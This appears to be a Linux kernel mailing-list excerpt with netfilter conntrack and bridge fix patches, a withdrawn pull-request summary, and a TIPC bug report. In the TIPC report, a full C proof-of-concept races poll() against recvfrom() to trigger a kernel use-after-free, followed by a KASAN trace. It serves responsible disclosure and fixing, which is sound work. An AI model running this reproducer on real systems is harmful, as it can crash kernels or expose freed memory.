 }
 
 static inline int __nf_ct_expect_check(struct nf_conntrack_expect *expect,
@@ -467,14 +472,18 @@ static inline int __nf_ct_expect_check(struct nf_conntrack_expect *expect,
 
 	h = nf_ct_expect_dst_hash(net, &expect->tuple);
 	hlist_for_each_entry_safe(i, next, &nf_ct_expect_hash[h], hnode) {
+		if (nf_ct_exp_is_expired(i)) {
+			nf_ct_unlink_expect(i);
+			continue;
+		}
 		if (master_matches(i, expect, flags) &&
 		    expect_matches(i, expect)) {
 			if (i->class != expect->class ||
 			    i->master != expect->master)
 				return -EALREADY;
 
-			if (nf_ct_remove_expect(i))
-				break;
+			nf_ct_unlink_expect(i);
+			break;
 		} else if (expect_clash(i, expect)) {
 			ret = -EBUSY;
 			goto out;
@@ -486,14 +495,8 @@ static inline int __nf_ct_expect_check(struct nf_conntrack_expect *expect,
 	if (helper) {
 		p = &helper->expect_policy[expect->class];
 		if (p->max_expected &&
-		    master_help->expecting[expect->class] >= p->max_expected) {
-			evict_oldest_expect(master_help, expect);
-			if (master_help->expecting[expect->class]
-						>= p->max_expected) {
-				ret = -EMFILE;
-				goto out;
-			}
-		}
+		    master_help->expecting[expect->class] >= p->max_expected)
+			evict_oldest_expect(master_help, expect, p);
 	}
 
 	cnet = nf_ct_pernet(net);
@@ -547,10 +550,8 @@ void nf_ct_expect_iterate_destroy(bool (*iter)(struct nf_conntrack_expect *e, vo
 		hlist_for_each_entry_safe(exp, next,
 					  &nf_ct_expect_hash[i],
 					  hnode) {
-			if (iter(exp, data) && timer_delete(&exp->timeout)) {
+			if (iter(exp, data))
 				nf_ct_unlink_expect(exp);
-				nf_ct_expect_put(exp);
-			}
 		}
 	}
 
@@ -577,10 +578,8 @@ void nf_ct_expect_iterate_net(struct net *net,
 			if (!net_eq(nf_ct_exp_net(exp), net))
 				continue;
 
-			if (iter(exp, data) && timer_delete(&exp->timeout)) {
+			if (iter(exp, data))
 				nf_ct_unlink_expect_report(exp, portid, report);
-				nf_ct_expect_put(exp);
-			}
 		}
 	}
 
@@ -657,17 +656,17 @@ static int exp_seq_show(struct seq_file *s, void *v)
 	struct net *net = seq_file_net(s);
 	struct hlist_node *n = v;
 	char *delim = "";
+	__s32 timeout;
 
 	expect = hlist_entry(n, struct nf_conntrack_expect, hnode);
 
 	if (!net_eq(nf_ct_exp_net(expect), net))
 		return 0;
+	if (nf_ct_exp_is_expired(expect))
+		return 0;
 
-	if (expect->timeout.function)
-		seq_printf(s, "%ld ", timer_pending(&expect->timeout)
-			   ? (long)(expect->timeout.expires - jiffies)/HZ : 0);
-	else
-		seq_puts(s, "- ");
+	timeout = (__s32)(READ_ONCE(expect->timeout) - nfct_time_stamp) / HZ;
+	seq_printf(s, "%d ", timeout > 0 ? timeout : 0);
 	seq_printf(s, "l3proto = %u proto=%u ",
 		   expect->tuple.src.l3num,
 		   expect->tuple.dst.protonum);
diff --git a/net/netfilter/nf_conntrack_h323_main.c b/net/netfilter/nf_conntrack_h323_main.c
index 7f189dceb3c4..24931e379985 100644
--- a/net/netfilter/nf_conntrack_h323_main.c
+++ b/net/netfilter/nf_conntrack_h323_main.c
@@ -1388,8 +1388,8 @@ static int process_rcf(struct sk_buff *skb, struct nf_conn *ct,
 				 "timeout to %u seconds for",
 				 info->timeout);
 			nf_ct_dump_tuple(&exp->tuple);
-			mod_timer_pending(&exp->timeout,
-					  jiffies + info->timeout * HZ);
+			WRITE_ONCE(exp->timeout,
+				   nfct_time_stamp + (info->timeout * HZ));
 		}
 		spin_unlock_bh(&nf_conntrack_expect_lock);
 	}
diff --git a/net/netfilter/nf_conntrack_helper.c b/net/netfilter/nf_conntrack_helper.c
index 2f35bdd0d7d7..8b94001c2430 100644
--- a/net/netfilter/nf_conntrack_helper.c
+++ b/net/netfilter/nf_conntrack_helper.c
@@ -181,10 +181,10 @@ nf_ct_helper_ext_add(struct nf_conn *ct, gfp_t gfp)
 	struct nf_conn_help *help;
 
 	help = nf_ct_ext_add(ct, NF_CT_EXT_HELPER, gfp);
-	if (help)
+	if (help) {
+		__set_bit(IPS_HELPER_BIT, &ct->status);
 		INIT_HLIST_HEAD(&help->expectations);
-	else
-		pr_debug("failed to add helper extension area");
+	}
 	return help;
 }
 EXPORT_SYMBOL_GPL(nf_ct_helper_ext_add);
@@ -203,10 +203,8 @@ int __nf_ct_try_assign_helper(struct nf_conn *ct, struct nf_conn *tmpl,
 		return 0;
 
 	help = nfct_help(tmpl);
-	if (help != NULL) {
+	if (help)
 		helper = rcu_dereference(help->helper);
-		set_bit(IPS_HELPER_BIT, &ct->status);
-	}
 
 	help = nfct_help(ct);
 
diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
index b429e648f06c..4e78d2482989 100644
--- a/net/netfilter/nf_conntrack_netlink.c
+++ b/net/netfilter/nf_conntrack_netlink.c
@@ -3014,8 +3014,8 @@ static int
 ctnetlink_exp_dump_expect(struct sk_buff *skb,
 			  const struct nf_conntrack_expect *exp)
 {
+	__s32 timeout = (__s32)(READ_ONCE(exp->timeout) - nfct_time_stamp) / HZ;
 	struct nf_conn *master = exp->master;
-	long timeout = ((long)exp->timeout.expires - (long)jiffies) / HZ;
 	struct nf_conntrack_helper *helper;
 #if IS_ENABLED(CONFIG_NF_NAT)
 	struct nlattr *nest_parms;
@@ -3178,6 +3178,9 @@ ctnetlink_exp_dump_table(struct sk_buff *skb, struct netlink_callback *cb)
 restart:
 		hlist_for_each_entry_rcu(exp, &nf_ct_expect_hash[cb->args[0]],
 					 hnode) {
+			if (nf_ct_exp_is_expired(exp))
+				continue;
+
 			if (l3proto && exp->tuple.src.l3num != l3proto)
 				continue;
 
@@ -3456,11 +3459,8 @@ static int ctnetlink_del_expect(struct sk_buff *skb,
 		}
 
 		/* after list removal, usage count == 1 */
-		if (timer_delete(&exp->timeout)) {
-			nf_ct_unlink_expect_report(exp, NETLINK_CB(skb).portid,
-						   nlmsg_report(info->nlh));
-			nf_ct_expect_put(exp);
-		}
+		nf_ct_unlink_expect_report(exp, NETLINK_CB(skb).portid,
+					   nlmsg_report(info->nlh));
 		spin_unlock_bh(&nf_conntrack_expect_lock);
 		/* have to put what we 'get' above.
 		 * after this line usage count == 0 */
@@ -3484,14 +3484,10 @@ static int
 ctnetlink_change_expect(struct nf_conntrack_expect *x,
 			const struct nlattr * const cda[])
 {
-	if (cda[CTA_EXPECT_TIMEOUT]) {
-		if (!timer_delete(&x->timeout))
-			return -ETIME;
+	if (cda[CTA_EXPECT_TIMEOUT])
+		WRITE_ONCE(x->timeout, nfct_time_stamp +
+			   ntohl(nla_get_be32(cda[CTA_EXPECT_TIMEOUT])) * HZ);
 
-		x->timeout.expires = jiffies +
-			ntohl(nla_get_be32(cda[CTA_EXPECT_TIMEOUT])) * HZ;
-		add_timer(&x->timeout);
-	}
 	return 0;
 }
 
diff --git a/net/netfilter/nf_conntrack_sip.c b/net/netfilter/nf_conntrack_sip.c
index c606d1f60b58..5ec3a4a4bbd7 100644
--- a/net/netfilter/nf_conntrack_sip.c
+++ b/net/netfilter/nf_conntrack_sip.c
@@ -897,11 +897,10 @@ static int refresh_signalling_expectation(struct nf_conn *ct,
 		    exp->tuple.dst.protonum != proto ||
 		    exp->tuple.dst.u.udp.port != port)
 			continue;
-		if (mod_timer_pending(&exp->timeout, jiffies + expires * HZ)) {
-			exp->flags &= ~NF_CT_EXPECT_INACTIVE;
-			found = 1;
-			break;
-		}
+		WRITE_ONCE(exp->timeout, nfct_time_stamp + (expires * HZ));
+		WRITE_ONCE(exp->flags, exp->flags & ~NF_CT_EXPECT_INACTIVE);
+		found = 1;
+		break;
 	}
 	spin_unlock_bh(&nf_conntrack_expect_lock);
 	return found;
@@ -920,8 +919,7 @@ static void flush_expectations(struct nf_conn *ct, bool media)
 	hlist_for_each_entry_safe(exp, next, &help->expectations, lnode) {
 		if ((exp->class != SIP_EXPECT_SIGNALLING) ^ media)
 			continue;
-		if (!nf_ct_remove_expect(exp))
-			continue;
+		nf_ct_unlink_expect(exp);
 		if (!media)
 			break;
 	}
@@ -1413,7 +1411,6 @@ static int process_register_request(struct sk_buff *skb, unsigned int protoff,
 
 	nf_ct_expect_init(exp, SIP_EXPECT_SIGNALLING, nf_ct_l3num(ct),
 			  saddr, &daddr, proto, NULL, &port);
-	exp->timeout.expires = sip_timeout * HZ;
 	rcu_assign_pointer(exp->assign_helper, helper);
 	exp->flags = NF_CT_EXPECT_PERMANENT | NF_CT_EXPECT_INACTIVE;
 
diff --git a/net/netfilter/nft_ct.c b/net/netfilter/nft_ct.c
index 25934c6f01fb..958054dd2e2e 100644
--- a/net/netfilter/nft_ct.c
+++ b/net/netfilter/nft_ct.c
@@ -1145,7 +1145,6 @@ static void nft_ct_helper_obj_eval(struct nft_object *obj,
 	help = nf_ct_helper_ext_add(ct, GFP_ATOMIC);
 	if (help && refcount_inc_not_zero(&to_assign->ct_refcnt)) {
 		rcu_assign_pointer(help->helper, to_assign);
-		set_bit(IPS_HELPER_BIT, &ct->status);
 
 		if ((ct->status & IPS_NAT_MASK) && !nfct_seqadj(ct))
 			if (!nfct_seqadj_ext_add(ct))
@@ -1326,7 +1325,7 @@ static void nft_ct_expect_obj_eval(struct nft_object *obj,
 		          &ct->tuplehash[!dir].tuple.src.u3,
 		          &ct->tuplehash[!dir].tuple.dst.u3,
 		          priv->l4proto, NULL, &priv->dport);
-	exp->timeout.expires = jiffies + priv->timeout * HZ;
+	exp->timeout += priv->timeout * HZ;
 
 	if (nf_ct_expect_related(exp, 0) != 0)
 		regs->verdict.code = NF_DROP;
-- 
2.47.3


* [PATCH net 14/14] netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Florian Westphal <fw@strlen.de>

This needs to test for nonzero retval.

Fixes: c54c7c685494 ("netfilter: nft_meta_bridge: add NFT_META_BRI_IIFPVID support")
Closes: https://sashiko.dev/#/patchset/20260618061631.21919-1-fw%40strlen.de
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/bridge/netfilter/nft_meta_bridge.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
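
The pattern behind this fix can be sketched in plain C. The sketch
assumes, for illustration, a lookup that returns 0 or a negative errno
and leaves its output parameter untouched on failure; port_get_pvid()
and eval_pvid() are hypothetical names, not the bridge API. If the
caller ignores the return value, it copies an uninitialised stack
variable to its destination.

```c
#include <errno.h>
#include <stdint.h>

/*
 * Hypothetical lookup: writes *pvid only on success and returns 0,
 * otherwise returns a negative errno and leaves *pvid untouched.
 */
static int port_get_pvid(int port, uint16_t *pvid)
{
	if (port < 0)
		return -EINVAL;

	*pvid = (uint16_t)(100 + port);
	return 0;
}

/* Store the pvid in *dest, or report the error and leave *dest alone. */
static int eval_pvid(int port, uint16_t *dest)
{
	uint16_t pvid;	/* deliberately uninitialised, like a stack local */
	int err;

	err = port_get_pvid(port, &pvid);
	if (err)
		return err;	/* pvid is never read on the failure path */

	*dest = pvid;
	return 0;
}
```

Checking the return value before the store keeps whatever happened to
be on the stack from reaching the destination.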

diff --git a/net/bridge/netfilter/nft_meta_bridge.c b/net/bridge/netfilter/nft_meta_bridge.c
index 3d95f68e0906..e4c9aa1f64e2 100644
--- a/net/bridge/netfilter/nft_meta_bridge.c
+++ b/net/bridge/netfilter/nft_meta_bridge.c
@@ -44,7 +44,9 @@ static void nft_meta_bridge_get_eval(const struct nft_expr *expr,
 		if (!br_dev || !br_vlan_enabled(br_dev))
 			goto err;
 
-		br_vlan_get_pvid_rcu(in, &p_pvid);
+		if (br_vlan_get_pvid_rcu(in, &p_pvid))
+			goto err;
+
 		nft_reg_store16(dest, p_pvid);
 		return;
 	}
-- 
2.47.3


* Re: [PATCH net 00/16] Netfilter fixes for net
From: Pablo Neira Ayuso @ 2026-06-20 22:28 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260619115452.93949-1-pablo@netfilter.org>

Hi,

Please scratch this v1 series.

I have posted a v2 for this series for the net tree.

Thanks.

On Fri, Jun 19, 2026 at 01:54:35PM +0200, Pablo Neira Ayuso wrote:
> Hi,
> 
> The following patchset contains Netfilter fixes for net. It contains
> fixes for a few crashes, but many of the patches are trivial/correctness
> fixes. There is also one rework of the conntrack expectation timeout
> strategy to deal with a possible race when removing an expectation.
> 
> 1) Fix the incorrect flowtable timeout extension for entries in
>    hw offload, from Adrian Bente. This is correcting a defect in
>    the functionality, no crash.
> 
> 2) Hold reference to device under the fake dst in br_netfilter,
>    from Haoze Xie. This is fixing a possible UaF if the device
>    is removed while packet is sitting in nfqueue.
> 
> 3) Reject template conntrack in xt_cluster, otherwise access to
>    uninitialized conntrack fields is possible, leading to WARN_ON
>    due to unset layer 3 protocol. From Wyatt Feng.
> 
> 4) Make sure the IPv6 tunnel header is in the linear skb data
>    area before pulling. While at it, remove incomplete NEXTHDR_DEST
>    support. From Lorenzo Bianconi. This can possibly lead to a crash
>    if the IPv4 header is not linear; GRO already guarantees this,
>    so it is unlikely but still possible.
> 
> 5) Bail out immediately if ENOMEM is seen in a nfnetlink batch,
>    no further processing since this will accumulate more bogus
>    errors. From Florian Westphal. Functional improvement
>    under memory stress, no crash.
> 
> 6) Use test_bit_acquire in ipset hash set to avoid reordering
>    of subsequent memory accesses. This is addressing an LLM-related
>    report, no crash has been observed. From Jozsef Kadlecsik.
> 
> 7) Use test_bit_acquire in ipset bitmap set too, for the same
>    reason as in the previous patch, from Jozsef Kadlecsik.
> 
> 8) Call kfree_rcu() after rcu_assign_pointer() to address a
>    possible UaF, very hard to trigger. Never observed in practise,
>    reported by LLM. Also from Jozsef Kadlecsik.
> 
> 9) Use disable_delayed_work_sync() instead of
>    cancel_delayed_work_sync() so that the ipset GC handler cannot
>    re-queue work, as reported by LLM. From Jozsef Kadlecsik. This is
>    for correctness.
> 
> 10) Restore the check in nft_payload for payload offsets exceeding
>     2^16. From Florian Westphal. This fixes a silent truncation,
>     not a big deal, but better be assertive and reject it.
> 
> 11) Validate NFT_META_BRI_IIFHWADDR can only run from bridge
>     prerouting. From Florian Westphal. Harmless but it could allow
>     to read bytes from skb->cb.
> 
> 12) Zero out destination hardware address during the flowtable
>     path setup, also from Florian. This is a correctness fix, LLM
>     points that possible infoleak can happen but topology to achieve
>     it is not clear.
> 
> 13) Skip IPv4 options if present when building the IPV4 reject reply.
>     Otherwise bytes in the IPv4 options header can be sent back to
>     origin where the ICMP header is being expected. Again from
>     Florian Westphal.
> 
> 14) Replace the timer API for expectations with a GC worker approach.
>     This implicitly fixes a race in nf_ct_remove_expectations(),
>     which might fail to remove the expectation because timer_delete()
>     returns false when the timer has expired and its callback is
>     running concurrently. This fix addresses a crash that has
>     already been reported with a reproducer.
> 
> 15) Store the master tuple in the expectation, since SLAB_TYPESAFE_BY_RCU
>     does not guarantee that accessing exp->master under the RCU read
>     lock refers to the right master conntrack. This was found during
>     the initial round of fixes for expectations; an LLM also found it.
> 
> 16) Check if br_vlan_get_pvid_rcu() fails to address a possible stack
>     infoleak of 4-bytes. From Florian Westphal.
> 
> This is slightly over the 15 patch limit in batches, please, allow this
> round to exceed it by one.
> 
> Please, pull these changes from:
> 
>   git://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git nf-26-06-19
> 
> Thanks.
> 
> ----------------------------------------------------------------
> 
> The following changes since commit 96e7f9122aae0ed000ee321f324b812a447906d9:
> 
>   eth: fbnic: take netif_addr_lock_bh() around rx mode address programming (2026-06-18 18:36:26 -0700)
> 
> are available in the Git repository at:
> 
>   git://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git tags/nf-26-06-19
> 
> for you to fetch changes up to 05477f7a037c127854b58441f60b34210668f5c3:
> 
>   netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak (2026-06-19 12:27:08 +0200)
> 
> ----------------------------------------------------------------
> netfilter pull request 26-06-19
> 
> ----------------------------------------------------------------
> Adrian Bente (1):
>       netfilter: flowtable: fix offloaded ct timeout never being extended
> 
> Florian Westphal (6):
>       netfilter: nfnetlink: make OOM conditions fatal
>       netfilter: nft_payload: reject offsets exceeding 65535 bytes
>       netfilter: nft_meta_bridge: add validate callback for get operations
>       netfilter: nft_flow_offload: zero device address for non-ether case
>       netfilter: nf_reject: skip iphdr options when looking for icmp header
>       netfilter: nft_meta_bridge: fix NFT_META_BRI_IIFPVID stack leak
> 
> Haoze Xie (1):
>       netfilter: nf_queue: pin bridge device while NFQUEUE holds fake dst
> 
> Jozsef Kadlecsik (4):
>       netfilter: ipset: Don't use test_bit() in lockless RCU readers in hash types
>       netfilter: ipset: Don't use test_bit() in lockless RCU readers in bitmap types
>       netfilter: ipset: fix order of kfree_rcu() and rcu_assign_pointer()
>       netfilter: ipset: make sure gc is properly stopped
> 
> Lorenzo Bianconi (1):
>       netfilter: flowtable: fix and simplify IP6IP6 tunnel handling
> 
> Pablo Neira Ayuso (2):
>       netfilter: nf_conntrack_expect: use conntrack GC to reap expectations
>       netfilter: nf_conntrack_expect: store master_tuple in expectation
> 
> Wyatt Feng (1):
>       netfilter: xt_cluster: reject template conntracks in hash match
> 
>  include/net/netfilter/nf_conntrack_expect.h        |  17 ++-
>  include/net/netfilter/nf_queue.h                   |   1 +
>  include/net/netfilter/nft_meta.h                   |   2 +
>  include/uapi/linux/netfilter/nf_conntrack_common.h |   1 +
>  net/bridge/netfilter/nft_meta_bridge.c             |  23 +++-
>  net/ipv4/netfilter/nf_reject_ipv4.c                |   2 +-
>  net/ipv6/ip6_tunnel.c                              |   7 +
>  net/netfilter/ipset/ip_set_bitmap_gen.h            |   4 +-
>  net/netfilter/ipset/ip_set_bitmap_ip.c             |   2 +-
>  net/netfilter/ipset/ip_set_bitmap_ipmac.c          |   2 +-
>  net/netfilter/ipset/ip_set_bitmap_port.c           |   2 +-
>  net/netfilter/ipset/ip_set_core.c                  |   4 +-
>  net/netfilter/ipset/ip_set_hash_gen.h              |  12 +-
>  net/netfilter/nf_conntrack_broadcast.c             |   1 +
>  net/netfilter/nf_conntrack_core.c                  |  33 ++++-
>  net/netfilter/nf_conntrack_expect.c                | 147 +++++++++++----------
>  net/netfilter/nf_conntrack_h323_main.c             |   4 +-
>  net/netfilter/nf_conntrack_helper.c                |  10 +-
>  net/netfilter/nf_conntrack_netlink.c               |  31 ++---
>  net/netfilter/nf_conntrack_sip.c                   |  13 +-
>  net/netfilter/nf_flow_table_core.c                 |  13 +-
>  net/netfilter/nf_flow_table_ip.c                   |  80 +++--------
>  net/netfilter/nf_flow_table_path.c                 |   4 +-
>  net/netfilter/nf_queue.c                           |  14 ++
>  net/netfilter/nfnetlink.c                          |   7 +
>  net/netfilter/nfnetlink_queue.c                    |   3 +
>  net/netfilter/nft_ct.c                             |   3 +-
>  net/netfilter/nft_meta.c                           |   5 +-
>  net/netfilter/nft_payload.c                        |  16 ++-
>  net/netfilter/xt_cluster.c                         |   2 +-
>  .../selftests/net/netfilter/nft_flowtable.sh       |   8 +-
>  31 files changed, 268 insertions(+), 205 deletions(-)
> 

* Re: Bug#1130336: [regression] Network failure beyond first connection after 69894e5b4c5e ("netfilter: nft_connlimit: update the count if add was skipped")
From: Pablo Neira Ayuso @ 2026-06-20 22:32 UTC (permalink / raw)
  To: Salvatore Bonaccorso
  Cc: Fernando Fernandez Mancera, Thorsten Leemhuis,
	Alejandro Oliván Alvarez, 1130336, Florian Westphal,
	Phil Sutter, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Simon Horman, netfilter-devel, coreteam, netdev,
	linux-kernel, regressions, stable
In-Reply-To: <ajb7ugG5mYxYIPva@eldamar.lan>

On Sat, Jun 20, 2026 at 10:44:42PM +0200, Salvatore Bonaccorso wrote:
> Hi Fernando,
> 
> On Wed, Apr 22, 2026 at 12:32:34PM +0200, Fernando Fernandez Mancera wrote:
> > On 4/22/26 11:18 AM, Thorsten Leemhuis wrote:
> > > Lo! Top-posting on purpose to make this easy to process.
> > > 
> > > What happened to this regression? It looks a bit like things stalled and
> > > fell through the cracks. Or Fernando, did you post a patch like you
> > > > mentioned? I looked for one referring to the commit or the reporter, but
> > > could not find anything -- but maybe I missed it.
> > > 
> > 
> > Yes, it stalled and fell through the cracks. Let me prepare a fix as I
> > mentioned.
> 
> Did that happen? On a quick check, at least 7.0.13 upstream still seems
> to exhibit the problem (or would it be fair to let this use case rest?)

I still have to take a fix Fernando posted.

* Re: [PATCH net] tipc: restrict socket queue dumps in enqueue tracepoints
From: XIAO WU @ 2026-06-21  1:21 UTC (permalink / raw)
  To: Li Xiasong, Jon Maloy
  Cc: stable, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Simon Horman, Ying Xue, Tuong Lien, netdev,
	tipc-discussion, yuehaibing, zhangchangzhong, weiyongjun1
In-Reply-To: <20260611135647.3666727-1-lixiasong1@huawei.com>

Hi Li Xiasong,

I see this patch was merged into net.git as commit acd7df8d9554 — thanks
for the fix.  However, a Sashiko AI code review [1] flagged that
`tipc_poll()` in the same file has the identical pre-existing issue: it
calls `trace_tipc_sk_poll()` with `TIPC_DUMP_ALL`, which triggers a dump
of all socket queues without holding the socket owner lock.  The merged
fix addressed `tipc_sk_enqueue()` but left `tipc_poll()` unchanged.

I was able to reproduce the remaining use-after-free in QEMU with KASAN
by racing `tipc_poll()` against `tipc_recvmsg()` on the same socket.

On Wed, Jun 11, 2026 at 09:56:47PM +0800, Li Xiasong wrote:
 > This commit addresses a KASAN use-after-free issue in tipc_sk_enqueue()
 > by restricting tracepoints to only dump the backlog queue
 > (TIPC_DUMP_SK_BKLGQ) instead of all queues (TIPC_DUMP_ALL).

Your fix correctly restricts the `tipc_sk_enqueue()` tracepoints, but
`tipc_poll()` still uses `TIPC_DUMP_ALL`:

```c
// net/tipc/socket.c:tipc_poll()
trace_tipc_sk_poll(sk, NULL, TIPC_DUMP_ALL, " ");
```

As a result, `tipc_sk_dump()` → `tipc_list_dump()` walks
`sk->sk_receive_queue` without holding `sk->sk_lock.slock`. If
`tipc_recvmsg()` concurrently dequeues and frees an skb from that
queue, the tracepoint dump reads freed memory.

[Reproduction]

Two threads on the same TIPC SOCK_DGRAM socket, with the
`tipc_sk_poll` tracepoint enabled:
- Thread 1: loops on poll() → trace_tipc_sk_poll → tipc_sk_dump
- Thread 2: loops on recvfrom() → frees skbs from the receive queue
   while the tracepoint walks it

Full PoC source (poc.c):
---8<----------------------------------------------------------------
// SPDX-License-Identifier: GPL-2.0-only
/*
  * tipc_poll() tracepoint use-after-free PoC
  * gcc -static -o poc poc.c -lpthread
  */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <poll.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdint.h>

#ifndef AF_TIPC
#define AF_TIPC         30
#endif

#define TIPC_SERVICE_RANGE      1
#define TIPC_SERVICE_ADDR       2
#define TIPC_CLUSTER_SCOPE      2

struct tipc_socket_addr { uint32_t ref; uint32_t node; };
struct sockaddr_tipc {
     unsigned short family;
     unsigned char  addrtype;
     signed   char  scope;
     union {
         struct tipc_socket_addr id;
         struct { uint32_t type; uint32_t lower; uint32_t upper; } nameseq;
         struct { struct { uint32_t type; uint32_t instance; } name;
                  uint32_t domain; } name;
     } addr;
};

static volatile int running = 1;   /* cleared by main() to stop both threads */
static int server_fd = -1;

static int enable_tracepoint(void)
{
     const char *paths[] = {
         "/sys/kernel/debug/tracing/events/tipc/tipc_sk_poll/enable",
         "/sys/kernel/tracing/events/tipc/tipc_sk_poll/enable", NULL
     };
     for (int i = 0; paths[i]; i++) {
         int fd = open(paths[i], O_WRONLY|O_TRUNC);
         if (fd < 0)
             continue;
         /* Report success only if the enable write actually landed. */
         ssize_t n = write(fd, "1", 1);
         close(fd);
         if (n == 1)
             return 0;
     }
     return -1;
}

static void *poll_thread(void *arg)
{
     struct pollfd pfd;
     (void)arg;
     while (running) {
         pfd.fd = server_fd; pfd.events = POLLIN; pfd.revents = 0;
         poll(&pfd, 1, 0);
     }
     return NULL;
}

static void *recv_thread(void *arg)
{
     char buf[4096];
     struct sockaddr_tipc src;
     socklen_t srclen = sizeof(src);
     (void)arg;
     while (running) {
         srclen = sizeof(src);
         recvfrom(server_fd, buf, sizeof(buf), MSG_DONTWAIT,
                  (struct sockaddr *)&src, &srclen);
         usleep(100);
     }
     return NULL;
}

int main(void)
{
     pthread_t poll_tid, recv_tid;
     uint32_t svc_type = 20000 + (getpid() % 40000);

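     if (enable_tracepoint() < 0)
         fprintf(stderr, "[-] could not enable the tipc_sk_poll tracepoint\n");
     server_fd = socket(AF_TIPC, SOCK_DGRAM, 0);
     if (server_fd < 0) {
         perror("socket(AF_TIPC)");
         return 1;
     }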

     struct sockaddr_tipc srv_addr = {0};
     srv_addr.family = AF_TIPC;
     srv_addr.addrtype = TIPC_SERVICE_RANGE;
     srv_addr.scope = TIPC_CLUSTER_SCOPE;
     srv_addr.addr.nameseq.type = svc_type;
     srv_addr.addr.nameseq.lower = 1;
     srv_addr.addr.nameseq.upper = 1;
     if (bind(server_fd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)) < 0) {
         perror("bind");
         return 1;
     }

     int client_fd = socket(AF_TIPC, SOCK_DGRAM, 0);
     if (client_fd < 0) {
         perror("socket(AF_TIPC)");
         return 1;
     }
     struct sockaddr_tipc dest_addr = {0};
     dest_addr.family = AF_TIPC;
     dest_addr.addrtype = TIPC_SERVICE_ADDR;
     dest_addr.scope = TIPC_CLUSTER_SCOPE;
     dest_addr.addr.name.name.type = svc_type;
     dest_addr.addr.name.name.instance = 1;

     char sendbuf[256];
     memset(sendbuf, 0x41, sizeof(sendbuf));
     for (int i = 0; i < 50; i++)
         sendto(client_fd, sendbuf, sizeof(sendbuf), 0,
                (struct sockaddr *)&dest_addr, sizeof(dest_addr));
     usleep(100000);

     pthread_create(&poll_tid, NULL, poll_thread, NULL);
     pthread_create(&recv_tid, NULL, recv_thread, NULL);

     for (int i = 0; i < 2000; i++) {
         sendto(client_fd, sendbuf, sizeof(sendbuf), 0,
                (struct sockaddr *)&dest_addr, sizeof(dest_addr));
         usleep(500);
     }

     running = 0;
     pthread_join(poll_tid, NULL);
     pthread_join(recv_tid, NULL);
     close(client_fd);
     close(server_fd);
     printf("[+] Done. Check dmesg.\n");
     return 0;
}
---8<----------------------------------------------------------------
Compile: gcc -static -o poc poc.c -lpthread

[KASAN report — kernel 7.1.0-rc6+, CONFIG_KASAN=y]

   ==================================================================
   BUG: KASAN: slab-use-after-free in tipc_skb_dump+0x12e7/0x1590
   Read of size 4 at addr ffff888033f3d8d0 by task poc/9474

   Call Trace:
    <TASK>
    tipc_skb_dump+0x12e7/0x1590
    tipc_list_dump+0x276/0x330
    tipc_sk_dump+0xb6c/0xda0
    trace_event_raw_event_tipc_sk_class+0x364/0x590
    tipc_poll+0x44a/0x6b0
    sock_poll+0x.../...
    do_sys_poll+0x.../...
    __x64_sys_poll+0x.../...
    do_syscall_64+0xcd/0xf80
    entry_SYSCALL_64_after_hwframe+0x77/0x7f

   Freed by task 9475:
    kfree_skb_reason+0x.../...
    tipc_recvmsg+0x.../...
    sock_recvmsg+0x.../...
    sock_read_iter+0x.../...
    vfs_read+0x.../...
    ksys_read+0x.../...

The fix is the same as what was already applied to `tipc_sk_enqueue()` in
commit acd7df8d9554: change `TIPC_DUMP_ALL` to `TIPC_DUMP_SK_BKLGQ` in
the `tipc_poll()` tracepoint, since poll() does not hold the socket lock
that protects the other queues.
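
To illustrate why narrowing the dump mask helps, here is a minimal
userspace sketch of a dump routine that only visits the queues selected
by a flag mask. Everything in it is a hypothetical stand-in: the
`DUMP_*` flags, `struct sk_model` and `sk_dump_model()` are not the
kernel definitions, and the bit values are arbitrary. It only models
which queues get touched, not the locking itself.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical stand-ins for the TIPC dump flags; the values are arbitrary. */
enum {
	DUMP_SK_SNDQ  = 1 << 0,
	DUMP_SK_RCVQ  = 1 << 1,
	DUMP_SK_BKLGQ = 1 << 2,
	DUMP_ALL      = DUMP_SK_SNDQ | DUMP_SK_RCVQ | DUMP_SK_BKLGQ,
};

/* Toy socket: queue lengths only, enough to show which queues are visited. */
struct sk_model {
	int sndq_len;
	int rcvq_len;
	int bklgq_len;
};

/*
 * Visit only the queues selected by mask and return the set of queues
 * that were touched. A caller that cannot guarantee exclusive access to
 * the receive queue should leave DUMP_SK_RCVQ out of the mask.
 */
static int sk_dump_model(const struct sk_model *sk, int mask)
{
	int touched = 0;

	assert(sk != NULL);

	if (mask & DUMP_SK_SNDQ) {
		printf("sndq: %d skbs\n", sk->sndq_len);
		touched |= DUMP_SK_SNDQ;
	}
	if (mask & DUMP_SK_RCVQ) {
		printf("rcvq: %d skbs\n", sk->rcvq_len);
		touched |= DUMP_SK_RCVQ;
	}
	if (mask & DUMP_SK_BKLGQ) {
		printf("bklgq: %d skbs\n", sk->bklgq_len);
		touched |= DUMP_SK_BKLGQ;
	}
	return touched;
}
```

In this model, calling `sk_dump_model(&sk, DUMP_SK_BKLGQ)` never reads
the receive queue, whereas `DUMP_ALL` reads every queue regardless of
what the caller has locked.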

[1] https://sashiko.dev/#/patchset/20260611135647.3666727-1-lixiasong1%40huawei.com
     (Sashiko AI code review — "Use-After-Free", Severity: High)

